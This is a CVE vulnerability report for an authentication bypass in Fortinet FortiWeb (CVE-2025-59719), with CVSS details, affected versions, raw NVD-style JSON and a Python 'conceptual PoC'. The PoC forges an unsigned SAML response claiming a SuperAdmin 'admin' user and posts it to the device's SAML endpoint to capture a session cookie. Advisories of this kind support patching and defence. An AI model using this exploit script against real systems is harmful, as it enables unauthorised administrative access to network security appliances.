Security Vulnerability Report
CVE-2025-59719 CVSS 9.8 CRITICAL

CVE-2025-59719

Published: 2025-12-09 18:15:55
Last Modified: 2025-12-09 19:59:30

Description

An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-347 (Improper Verification of Cryptographic Signature)

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (versions 7.4.0 through 7.4.9, inclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (versions 7.6.0 through 7.6.4, inclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:8.0.0:*:*:*:*:*:*:* - VULNERABLE
FortiWeb 8.0.0
FortiWeb 7.6.0 - 7.6.4
FortiWeb 7.4.0 - 7.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59719 PoC - FortiWeb SAML Signature Bypass
# This is a conceptual PoC demonstrating the attack vector
import base64

import requests

TARGET_URL = "https://target-fortiweb:8443/"
ATTACKER_CONTROLLED_USER = "admin"


def create_malicious_saml_response():
    """
    Create a malicious SAML response with forged identity.
    The vulnerability allows bypassing signature verification.
    """
    saml_response = f"""
    <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
        <saml:Issuer>https://idp.example.com</saml:Issuer>
        <samlp:Status>
            <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
        </samlp:Status>
        <saml:Assertion>
            <saml:Subject>
                <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">
                    {ATTACKER_CONTROLLED_USER}
                </saml:NameID>
            </saml:Subject>
            <saml:Conditions NotBefore="2025-01-01T00:00:00Z"
                             NotOnOrAfter="2026-01-01T00:00:00Z"/>
            <saml:AttributeStatement>
                <saml:Attribute Name="role">
                    <saml:AttributeValue>SuperAdmin</saml:AttributeValue>
                </saml:Attribute>
            </saml:AttributeStatement>
        </saml:Assertion>
    </samlp:Response>
    """
    return base64.b64encode(saml_response.encode()).decode()


def exploit_cve_2025_59719():
    """
    Exploit the improper signature verification vulnerability.
    """
    saml_response = create_malicious_saml_response()

    # Forge SAMLResponse parameter with malicious content
    exploit_data = {
        "SAMLResponse": saml_response,
        "RelayState": "/admin/dashboard",
    }

    # Send crafted request to bypass authentication
    target = TARGET_URL.rstrip("/") + "/saml2/acs"
    try:
        response = requests.post(target, data=exploit_data, verify=False, timeout=30)
        if response.status_code == 200 and "session" in response.cookies:
            print("[+] Authentication bypass successful!")
            print(f"[+] Session cookie obtained: {response.cookies.get('session')}")
            return response.cookies.get("session")
        else:
            print("[-] Exploitation failed or target not vulnerable")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-59719 FortiWeb SAML Signature Bypass PoC")
    print("=" * 60)
    exploit_cve_2025_59719()
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-647 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-59719",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T18:15:55.150",
    "lastModified": "2025-12-09T19:59:29.507",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message."
      },
      {
        "lang": "es",
        "value": "Una vulnerabilidad de verificación impropia de firma criptográfica en Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 hasta 7.6.4, FortiWeb 7.4.0 hasta 7.4.9 puede permitir a un atacante no autenticado eludir la autenticación de inicio de sesión de FortiCloud SSO a través de un mensaje de respuesta SAML manipulado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-347"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.4.0",
                "versionEndIncluding": "7.4.9",
                "matchCriteriaId": "87CA4C4B-2701-4DEB-BB36-DBBFBD19D48A"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndIncluding": "7.6.4",
                "matchCriteriaId": "8473958D-E679-4501-8D78-5350FA8FC1FC"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:8.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "6578F992-46E7-422C-A837-5A7F0E966AB6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-647",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```